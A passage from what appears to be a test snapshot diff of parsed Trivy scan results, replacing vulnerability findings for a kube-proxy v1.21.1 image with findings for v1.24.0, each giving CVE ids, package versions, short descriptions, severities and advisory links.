"https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "iptables", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "1.8.2.2", - "packageName": "libapt-pkg5.0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.0.6-9.2~deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3112-1", - "installedVersion": "1.0.6-9.2~deb10u1", - "packageName": "libbz2-1.0", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "bzip2 - bugfix update", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33574", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33574", - "https://linux.oracle.com/cve/CVE-2021-33574.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210629-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", - "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: mq_notify does not handle separately allocated thread attributes", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33574", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33574", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-35942", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "4.16.0-2+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.16.0-2", + "packageName": "libtasn1-6", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", - "https://access.redhat.com/security/cve/CVE-2021-35942", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", - "https://linux.oracle.com/cve/CVE-2021-35942.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", - "https://security.gentoo.org/glsa/202208-24", - "https://security.netapp.com/advisory/ntap-20210827-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", - "https://sourceware.org/glibc/wiki/Security%20Exceptions", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, "category": "Vulnerability", - "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Arbitrary read in wordexp()", + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-35942", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-35942", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, { "type": "URL", - "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5707-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23218", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.3.1-1+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46828", + "installedVersion": "1.3.1-1", + "packageName": "libtirpc-common", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23218", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", - "https://linux.oracle.com/cve/CVE-2022-23218.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23218", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "https://access.redhat.com/errata/RHSA-2022:8400", + "https://access.redhat.com/security/cve/CVE-2021-46828", + "https://bugzilla.redhat.com/2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "https://errata.rockylinux.org/RLSA-2022:8400", + "https://linux.oracle.com/cve/CVE-2021-46828.html", + "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "https://security.gentoo.org/glsa/202210-33", + "https://security.netapp.com/advisory/ntap-20221007-0004/", + "https://ubuntu.com/security/notices/USN-5538-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "https://www.debian.org/security/2022/dsa-5200", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", + "name": "libtirpc: DoS vulnerability with lots of connections", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23218", + "value": "https://avd.aquasec.com/nvd/cve-2021-46828", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23218", + "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "value": "https://access.redhat.com/errata/RHSA-2022:8400", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-46828", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://bugzilla.redhat.com/2109352", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://errata.rockylinux.org/RLSA-2022:8400", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202210-33", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5538-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5200", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23219", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.3.1-1+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46828", + "installedVersion": "1.3.1-1", + "packageName": "libtirpc3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23219", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", - "https://linux.oracle.com/cve/CVE-2022-23219.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23219", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "https://access.redhat.com/errata/RHSA-2022:8400", + "https://access.redhat.com/security/cve/CVE-2021-46828", + "https://bugzilla.redhat.com/2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "https://errata.rockylinux.org/RLSA-2022:8400", + "https://linux.oracle.com/cve/CVE-2021-46828.html", + "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "https://security.gentoo.org/glsa/202210-33", + "https://security.netapp.com/advisory/ntap-20221007-0004/", + "https://ubuntu.com/security/notices/USN-5538-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "https://www.debian.org/security/2022/dsa-5200", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", + "name": "libtirpc: DoS vulnerability with lots of connections", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23219", + "value": "https://avd.aquasec.com/nvd/cve-2021-46828", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23219", + "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "value": "https://access.redhat.com/errata/RHSA-2022:8400", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-46828", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://bugzilla.redhat.com/2109352", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://errata.rockylinux.org/RLSA-2022:8400", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + 